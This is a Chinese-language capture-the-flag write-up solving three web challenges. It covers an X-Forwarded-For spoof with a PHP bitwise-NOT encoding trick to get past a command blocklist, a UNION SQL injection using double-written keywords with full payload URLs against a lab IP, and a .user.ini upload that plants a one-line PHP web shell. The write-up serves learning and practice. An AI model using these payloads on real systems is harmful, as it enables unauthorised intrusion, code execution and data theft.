HNU1

HNU1.31测试wp

一、Welcome To HnuSec

首先进入靶场

发现没有可以交互的地方

首先查看网页源代码

发现需要用本地用户才能登入

这里就要在请求包中加入

X-Forwarded-For:127.0.0.1

让服务器认为请求访问的是本地用户

收到返回包

访问这个地址

通过代码审计我们需要用get上传一个code

但是题目ban掉了

tac|cat|more|cp|touch|tee|system| |flag

这些代码

这里我们需要绕过这些禁用

这里我再网上找到了一个URL的脚本,可以先对想要输入的内容在电脑上进行URL编码进行绕过

编码的程序是这样的

<?php
error_reporting(0);
$a='system';
$b=urlencode(~$a);
echo $b;
echo "<br>";
$c='ls /';
$d=urlencode(~$c);
echo $d;

按理说要上传

这样一句话,但是system被ban了所以我们使用脚本

在php在线上跑我的脚本

右边就是system(‘ls /’)被url编码后的代码

我们将编码后的代码取反再上传就可以得到以下回显

发现有Linux的根目录

发现有flag文件

这时就要访问flag文件,但是flag和cat都被ban了,所以继续使用脚本

只需要将这里进行修改,其他操作都一样

重新上传,就可以得到flag

二、Wonderful SQL

这里需要我们进行爆破

得到密码:账号:HnuSec 密码:HnuSec5555Winter

看到提示:

需要在/AdMiNi_HeR3 传入id参数

有过滤,union这里需要改为uunionnion

查数据库:http://114.116.119.253:30015/AdMiNi_HeR3?id=-1%27)uunionnion select 1,database(),3%23

Wonderful

wonderful

查表:secret,user

这里information里的or过滤了所以要改为infoorrmation

http://114.116.119.253:30015/AdMiNi_HeR3?id=-1%27)uunionnion select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema=database()%23

查字段:name,value

http://114.116.119.253:30015/AdMiNi_HeR3?id=-1%27)uunionnion select 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_name='secret'%23

查对应字段:flag,flag_here

http://114.116.119.253:30015/AdMiNi_HeR3?id=-1%27)uunionnion select 1,group_concat(name),3 from secret%23

查value字段对应的值,value被过滤,双写vvaluealue

http://114.116.119.253:30015/AdMiNi_HeR3?id=-1%27)uunionnion select 1,group_concat(vvaluealue),3 from secret%23

三、Short Uploader

文件上传,发现php后缀全部过滤,考虑用.user.ini方法

上传1.jpg,内容?><?=`ls`;

cat /flag

posted @ 2023-08-09 09:33  Sdegree  阅读(31)  评论(0编辑  收藏  举报